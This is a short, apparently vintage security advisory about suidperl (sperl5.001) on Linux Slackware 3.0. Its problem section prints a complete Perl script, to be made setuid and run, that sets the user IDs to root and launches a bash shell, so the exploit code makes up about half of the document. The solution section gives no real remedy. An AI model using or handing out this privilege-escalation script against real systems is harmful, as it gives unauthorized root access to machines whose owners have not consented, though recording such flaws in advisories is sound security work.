COMMAND

    perl (suidperl/sperl5.001)

SYSTEMS AFFECTED

    Linux Slackware 3.0

PROBLEM

    If you have suid perl you can hrab root because of  bad permission
    problem.  Exploit would look like this:

        #!/usr/bin/perl -U
        # root access on any SUID perl infected system......
        # chmod 4755 this script and run it....

        $ENV{PATH}="/bin:/usr/bin";
        $>=0;$<=0;
        exec("/bin/bash");

SOLUTION

    Well, if  this is  result of  bad permissions,  you know  what you
    have to do, don't you?